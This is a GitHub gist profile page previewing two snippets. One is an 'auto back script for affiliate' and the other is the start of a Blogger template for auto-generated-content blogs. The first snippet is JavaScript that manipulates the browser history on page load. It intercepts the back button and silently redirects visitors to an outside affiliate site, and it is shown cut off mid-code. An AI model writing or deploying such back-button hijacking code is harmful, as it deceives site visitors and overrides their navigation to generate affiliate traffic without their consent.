Skip to content

Instantly share code, notes, and snippets.

View KunJackla's full-sized avatar

awenk audico KunJackla

View GitHub Profile
@KunJackla
KunJackla / gist:202ef7b669e7f56d42a2588f772564ff
Created May 15, 2022 13:59
auto back script for affiliate
<script type="text/javascript" language="javascript">
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/history");
history.pushState(null, document.title, location.pathname);
window.addEventListener("popstate", function() {
if(location.hash === "#!/history") {
history.replaceState(null, document.title, location.pathname);
setTimeout(function(){
location.replace("https://cavanaskin.com");
@KunJackla
KunJackla / AGC BLOGSPOT
Created May 15, 2022 14:00
AGC BLOGSPOT
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<HTML expr:dir='data:blog.languageDirection' lang='id'>
&lt;head&gt;
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<meta content='width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=5.0' name='viewport'/>
<b:if cond='data:view.isSingleItem'>
<title><data:blog.pageName/></title>
<b:elseif cond='data:view.isHomepage'/>
<title><data:blog.title/></title>